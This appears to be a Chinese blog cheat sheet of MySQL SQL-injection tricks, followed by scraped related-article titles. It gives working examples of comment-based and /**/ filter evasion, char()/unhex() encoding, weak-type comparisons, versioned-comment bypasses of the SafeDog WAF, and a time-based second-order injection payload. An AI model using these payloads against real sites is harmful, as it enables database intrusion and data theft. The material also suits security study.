那些容易被忽略、容易被弄错的地方

sql注入时的技巧

=========================================================================

*	如果单引号被转义,在当前数据库采用GBK编码的前提下,可以考虑双字节注入。

*	注释符的正确用法

		“-- ”才是mysql中的注释,注意后面有个空格

		mysql> select  user()  from (select 1)x where  '1'='1';-- '

		+----------------+

		| user()         |

		+----------------+

		| root@localhost |

		+----------------+

		1 row in set (0.00 sec)

		“#”注释,后面接不接空格无所谓

		mysql> select  user()  from (select 1) x where  '1'='1';#'

		+----------------+

		| user()         |

		+----------------+

		| root@localhost |

		+----------------+

		1 row in set (0.00 sec)

*	用/**/替代空格

		mysql> select/**/1;

		+---+

		| 1 |

		+---+

		| 1 |

		+---+

		1 row in set (0.00 sec)

*	sql语句中字符串转义

	-	mysql> select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 );

		+-------------------------------------------------------------------+

		| char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 ) |

		+-------------------------------------------------------------------+

		|  /tmp/f_user.txt                                                  |

		+-------------------------------------------------------------------+

		1 row in set (0.00 sec)

	-	mysql>  select  concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) ;

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		| concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) |

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		|  /tmp/f_user.txt                                                                                                                                                    |

		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+

		1 row in set (0.00 sec)

		# utf-8

	-	mysql> select unhex('E6B8B8E5AEA2');

		+-----------------------+

		| unhex('E6B8B8E5AEA2') |

		+-----------------------+

		| 游客                  |

		+-----------------------+

		1 row in set (0.00 sec)

*	数字和字符的比较,类似php中的弱类型

	-	mysql> select '10asfasfdeasdfasdf'=10;

		+-------------------------+

		| '10asfasfdeasdfasdf'=10 |

		+-------------------------+

		|                       1 |

		+-------------------------+

	-	mysql> select '0esfsadf'=0;

		+--------------+

		| '0esfsadf'=0 |

		+--------------+

		|            1 |

		+--------------+

*	绕过安全狗

	**	正则绕过

		-	select 1/*!50000union/*!*//*!50000select/*!*/2;

				+---+

				| 1 |

				+---+

				| 1 |

				| 2 |

				+---+

		-	mysql> select/*/#\*/1;

				+---+

				| 1 |

				+---+

				| 1 |

				+---+

				1 row in set (0.00 sec)

*	多个单引号相连时,最外层两个孤独单引号配对闭合,中间的连续偶数个单引号中每两个一组换算成一个。

	-	mysql> select '123''';

			+------+

			| 123' |

			+------+

			| 123' |

			+------+

			1 row in set (0.00 sec)

	-	mysql> select '123''''';

			+-------+

			| 123'' |

			+-------+

			| 123'' |

			+-------+

	-	mysql> select user from mysql.user where user='nickname'' and password=' or sleep(0.1);#'

			Empty set (1.00 sec)

		此特点可以引发“二次注入”,比如,注册用户时输入昵称{nickname'},被转义为{nickname\'}但在插入到数据库后被还原,

		那么在需要将昵称作为查询条件的页面中就存在二次注入,另一个条件字段的值为{ or 0=sleep(1);#}即可触发。

  

sql注入时易被忽略的语法技巧以及二次注入的更多相关文章

  1. 【sql注入】简单实现二次注入

    [sql注入]简单实现二次注入 本文转自:i春秋社区 测试代码1:内容详情页面 [PHP] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 1 ...

  2. sql手工注入时的探测技巧汇总

    工具的灵活性肯定比不上人,在手工探测的基础上再去自定义工具,才是正道. sql注入时手工探测技巧 =================================================== ...

  3. sql SELECT时的with(nolock)选项说明

    I used to see my senior developers use WITH (NOLOCK) when querying in SQL Server and wonder why they ...

  4. 转:sql SELECT时的with(nolock)选项说明

    I used to see my senior developers use WITH (NOLOCK) when querying in SQL Server and wonder why they ...

  5. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 4.全局防护Bypass之二次注入

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.二次注入也是 ...

  6. Sql 注入详解:宽字节注入+二次注入

    sql注入漏洞 原理:由于开发者在编写操作数据库代码时,直接将外部可控参数拼接到sql 语句中,没有经过任何过滤就直接放入到数据库引擎中执行了. 攻击方式: (1) 权限较大时,直接写入webshel ...

  7. Python连接MySQL数据库执行sql语句时的参数问题

    由于工作需要,今天写了一个Python小脚本,其中需要连接MySQL数据库,在执行sql命令时需要传递参数,结果出问题了.在网上查了一下,发现有以下几种方式传递参数: 一.直接把sql查询语句完整写入 ...

  8. ASPNETCOREAPI 跨域处理 SQL 语句拼接 多条件分页查询 ASPNET CORE 核心 通过依赖注入(注入服务)

    ASPNETCOREAPI 跨域处理 AspNetCoreApi 跨域处理 如果咱们有处理过MV5 跨域问题这个问题也不大. (1)为什么会出现跨域问题:  浏览器安全限制了前端脚本跨站点的访问资源, ...

  9. sql查询时增加自动编号和分页

    查询时加序号 a:没有主键的情形: ,) as iid,* into #tmp from TableName Select * from #tmp Drop table #tmp b:有主键的情形: ...

随机推荐

  1. ORA-28000: the account is locked 账户被锁

    这种情况可能是因为你输入错误的用户名密码达到10次,oracle给你锁住了. 解决方法: 首先 ~bash$ sqlplus /nolog SQL> conn sys/sys as sysdba ...

  2. RedHat 和 Mirantis OpenStack 产品的版本和功能汇总和对比(持续更新)

    Mirantis 和 Red Hat 作为 OpenStack 商业化产品领域的两大领军企业,在行业内有重要的地位.因此,研究其产品版本发布周期和所支持的功能,对制定 OpenStack 产品的版本和 ...

  3. Bootsrap基本应用

    Bootsrap 用法: <!DOCTYPE html> <html lang="en"> <head> <meta charset=&q ...

  4. 图片下方出现多3px的原因及解决方法

    产生原因:主要是因为图片的垂直对齐方式vertical-align引发的,默认值是baseline,默认为此值时图片下方就会多出3px. 解决方案: 1.将图片的垂直对齐方式vertical-alig ...

  5. docker学习(3) 容器的启动过程

    这一节我们来稍微了解下docker原理性的东西 docker run -i -t ubuntu /bin/bash 输入上面这行命令,启动一个ubuntu容器时,到底发生了什么? 大致过程可以用下图描 ...

  6. SQL Server数据库设计规范

    数据库设计规范 1.简介 数据库设计是指对一个给定的应用环境,构造最优的数据库模式,建立数据库及其他应用系统,使之能有效地存储数据,满足各种用户的需求.数据库设计过程中命名规范很是重要,命名规范合理的 ...

  7. ICP算法(Iterative Closest Point迭代最近点算法)

    标签: 图像匹配ICP算法机器视觉 2015-12-01 21:09 2217人阅读 评论(0) 收藏 举报 分类: Computer Vision(27) 版权声明:本文为博主原创文章,未经博主允许 ...

  8. C# 动态修改Config

    Configuration config = ConfigurationManager.OpenExeConfiguration(ConfigurationUserLevel.None); confi ...

  9. sqlite3的图片的(二进制数据)存取操作

    sqlite3的图片的(二进制数据)存取操作   前言 上篇介绍了sqlite3的一些常用插入操作方法和注意事项,在实际项目中遇到了图片缓存的问题,由于服务器不是很稳定,且受到外界环境的干扰(例如断电 ...

  10. JAVA+Maven+TestNG搭建接口测试框架及实例

    1.配置JDK 见另一篇博客:http://www.cnblogs.com/testlurunxiu/p/5933912.html 2.安装Eclipse以及TestNG Eclipse下载地址:ht ...